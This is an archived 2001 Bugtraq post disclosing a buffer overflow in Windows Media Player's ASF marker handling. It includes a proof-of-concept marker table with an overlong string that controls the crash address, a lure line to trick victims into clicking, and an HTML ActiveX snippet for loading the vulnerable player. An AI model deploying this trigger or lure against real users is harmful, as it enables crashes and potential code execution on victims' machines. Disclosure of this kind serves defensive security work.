[22147] in bugtraq
MS Windows Media Player ASF Marker Buffer Overflow
daemon@ATHENA.MIT.EDU (Pauli Ojanpera)
Tue Aug 7 15:09:24 2001
From: "Pauli Ojanpera" <pauli_ojanpera@hotmail.com>
To: bugtraq@securityfocus.com
Date: Tue, 07 Aug 2001 21:55:00 +0300
Mime-Version: 1.0
Content-Type: text/plain; format=flowed
Message-ID: <F168nRMWuLn5U9T3TGJ00000e91@hotmail.com>
I dunno if I've sent this before.
If you embed a marker long enough in an .ASF video file
you can make WMP crash when a victim clicks the
marker drop down list under the file during playback.
Use ASFCHOP.EXE to embed the following script to any
ASF file:
----8<----cut-here-----8<----
start_marker_table
0.0
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC
0.1 Click here to bypass the advertisements!
end_marker_table
----8<----cut-here-----8<----
As you can see, I used a catch to persuade the victim
to click the bar. When a victim clicks on the bar,
WMP crashes at offset 43434343 ("CCCC").
With WMP7 you have to use an ActiveX object on a HTML
page to launch the old buggy WMP module. Make sure you
set marker bar visible in the parameters. I guess it's
the parameter "ShowGotoBar"
Dummy example:
<OBJECT classid=CLSID:22d6f312-b0f6-11d0-94ab-0080c74c7e95 id=DSPlay1
name=DSPlay1
type="application/x-oleobject">
<PARAM NAME="ShowControls" VALUE="-1">
<PARAM NAME="ShowGotoBar" VALUE="1">
<PARAM NAME="ShowStatusBar" VALUE="1">
<PARAM NAME="ControlType" VALUE="2">
<PARAM NAME="Filename" VALUE="a.asf">
<PARAM NAME="InvokeURLs" VALUE="-1">
</OBJECT>
_________________________________________________________________
Get your FREE download of MSN Explorer at http://explorer.msn.com/intl.asp
